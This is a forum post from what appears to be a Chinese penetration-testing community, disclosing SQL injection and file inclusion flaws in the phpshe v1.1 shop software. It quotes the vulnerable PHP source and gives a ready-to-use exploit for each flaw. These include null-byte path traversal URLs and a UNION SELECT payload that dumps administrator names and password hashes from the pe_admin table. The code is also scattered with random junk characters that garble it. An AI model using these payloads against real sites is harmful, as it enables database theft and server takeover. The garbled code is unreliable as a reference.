找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 3352|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/*******************************************************/
! _( A: v0 r- p  |7 s/* Phpshe v1.1 Vulnerability5 I) s' g$ u" N2 E% x5 U) t6 s9 j
/* ========================
$ e; G9 I' @  q; @! d- N5 }& N; \/* By: : Kn1f38 S; N% Y. t) K) b; }
/* E-Mail : 681796@qq.com! @/ q' Z. s8 H0 @. B% }) O8 @. u6 l
/*******************************************************/
4 ~& e. I; {1 V' F0×00 整体大概参数传输
& P9 C/ _$ A6 R7 r3 A3 q# z / B" V1 C0 [2 R- P) D  ~

) S5 K4 M3 N8 a3 L
2 T8 b0 a( J* ^3 c" }6 |//common.php
! G6 o* [% C; A3 _4 D+ b: J3 q5 G* Zif (get_magic_quotes_gpc()) {
7 B  q. ?1 ^1 n0 C9 d6 D# {& s$ T!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ W; v1 b; g* S1 ~( Y1 m$ f6 F!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
( }9 l2 X$ i5 v/ s, V9 z}6 x# D6 W" H$ V1 Y6 r
else {6 W8 q( t. ~  z! Y3 `5 M3 f7 b
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
" C. c; ]* @& _* i; z!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');& S! k2 {! @% i  [2 R- t4 V4 E
}
& x* r( s$ F* O, }5 U9 }. {+ rsession_start();
, Y- B/ U" j& Q1 ]6 x" C! g( r!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
, g/ ]! M4 q7 ^6 q$ `  ]!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
) b. L* d' K8 E/ P( O2 z3 a3 Y+ }
7 M4 d: e6 S% f$ u% I$ Z0×01 包含漏洞. T% J' i8 M# `

" h  `2 Z' \: B1 ?5 O2 \+ t: [8 u# Q# a: }$ u& ~# k- }9 D
//首页文件
$ Y, q* K/ s' T! }9 w( J<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
! i; P0 Q4 ]& e# Iinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞" d5 W7 D$ i, z$ G% C
pe_result();6 U6 G2 l) x& c3 E4 B' n* }
?>
$ Q; j. e& Q' ~* s, V/ N0 z; n//common 文件 第15行开始
2 E/ V  l& g& N: O- jurl路由配置  y/ s& C* [7 @: t+ L* H
$module = $mod = $act = 'index';3 G, X' n1 X( O0 h' \
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
, a1 ~/ u2 C" B# @$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
  `( A$ o! y0 [$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
, T+ p3 D; ?, Y# W  Q, ^; H//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%008 x9 K7 v4 @2 z, t! Y


/ Z. h# L- l2 E: ^/ F1 m4 S
" t# Z0 @, y- K1 C( s8 L 0×02 搜索注入
% ^- o/ \6 o, Y' f ; |" X$ `: P$ w5 H
<code id="code2">

//product.php文件) ?- e- X  {( T. |; T  d
case 'list':
$ \9 n$ J' J% y' h" G$category_id = intval($id);
, q8 p) E$ }1 ]5 ]- m  J$info = $db->pe_select('category', array('category_id'=>$category_id));2 G( A% w" E4 |3 k; D
//搜索
, I, |4 K  [# A. {$sqlwhere = " and `product_state` = 1";
0 K6 _7 g) j. I3 s) E+ v- Vpe_lead('hook/category.hook.php');3 O) P. A! t% H
if ($category_id) {
5 p* Q7 R( X0 l9 Pwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";+ `6 L- ]7 [6 H" j1 V" [* A/ q0 E1 |$ ~
}" F" K' v& D& D5 ?) b
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
2 ~, {) F7 W  @if ($_g_orderby) {0 ?% b( b) x% L$ Z! F% {) @
$orderby = explode('_', $_g_orderby);
5 Y8 i" Z" F, ^7 y3 C$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";9 N8 g# m; }0 j4 t; Z! t
}
9 I( Y$ X8 R. \  c+ g( J+ eelse {
7 j* k: G8 \$ Q' s( e: L- p7 K, C$sqlwhere .= " order by `product_id` desc";* b! e9 K" C6 x2 |, m
}
0 M/ d9 [& m0 F7 ]$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
  z! M+ T" v7 E$ _* d//热卖排行+ t! C) g$ y# m: V* c# F
$product_hotlist = product_hotlist();0 X; K# r8 U. U3 B5 `2 k( r! Z
//当前路径
: t2 t" u' O6 R3 w3 v* q) E$nowpath = category_path($category_id);
  ]5 y, r5 V8 q7 O: ?4 d" Y: n$seo = pe_seo($info['category_name']);
' h3 F/ h# T  L- Z' v" p1 qinclude(pe_tpl('product_list.html'));
2 u# j/ T* _* C8 t4 d//跟进selectall函数库
' @4 N( a/ H7 v; n# c, {public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())8 o! }( }& V* Q5 s
{
# N. k3 ~8 Q1 `7 E9 E4 b& G//处理条件语句
) k  l! F& V: O8 P: u3 o; P$sqlwhere = $this->_dowhere($where);
6 J, _& T0 b( E- ]+ H0 R! z+ Mreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
8 Z6 C  |4 j: ~: Q( n$ w& U) ^}6 _" @8 t# k5 s6 o4 Q( D+ N/ w7 T4 j
//exp: U% h' ~3 i$ r7 B
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='12 R: \. S1 X+ i, o

</code>4 E$ M( X* d, B

8 }2 N: v  X9 z+ B8 B% o7 v* z0×03 包含漏洞2
7 m; C6 H, O. ]! U# |, u6 Q( @
  f! q; h# z' e8 _2 m; r<code id="code3">

//order.php

case 'pay':


6 W! ?# ?, ]8 u0 \- A/ ~0 }$order_id = pe_dbhold($_g_id);


5 Z" g0 l* y, Z$cache_payway = cache::get('payway');


! A+ i2 h9 P$ ]# Zforeach($cache_payway as $k => $v) {

2 L4 d) Q$ e5 _4 U' G- M- G
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

" q- i0 I, S+ R# j8 p
if ($k == 'bank') {

/ `4 N/ y$ a* l& h" b# k
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


5 H& s& d" P+ u% C7 j( ?}

# H2 l$ I4 {# B0 P, Y
}


" f. U6 X& I0 l! h$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


$ Z8 G9 C) ]. Y" w& Q! \; h!$order['order_id'] && pe_error('订单号错误...');

( i$ K: \' C# S; S
if (isset($_p_pesubmit)) {

8 g4 ~7 b$ I' S
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


# t. h9 \. r/ V3 V: H9 m$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

$ D4 U; a( G. }
foreach ($info_list as $v) {


# d" E/ E. o  n4 @: l3 [) N$order['order_name'] .= "{$v['product_name']};";
6 J6 I( l/ L8 w- d5 O


. o' t1 u! E4 O- y1 S. F8 `}


6 |( ?  i7 i7 F- ]5 Oecho '正在为您连接支付网站,请稍后...';

0 {' @2 v3 V# `1 E) r
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

* C  S& Q+ I$ a* e/ t7 C
}//当一切准备好的时候就可以进行"鸡肋包含了"


9 `, X! k+ R. {' Y! N& Pelse {

9 d1 o; `* ~1 E6 i
pe_error('支付错误...');


1 {' C- x9 h0 w4 Q% j}

& ~6 T% W2 l  U# q; u. L
}


# o& c( A" t8 X1 y. V! {$seo = pe_seo('选择支付方式');


% ^) u  U: R) t. u' |( Pinclude(pe_tpl('order_pay.html'));


+ J/ w! G* c: ]5 _* h2 Qbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
: r1 u. R% f0 z/ h, D

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表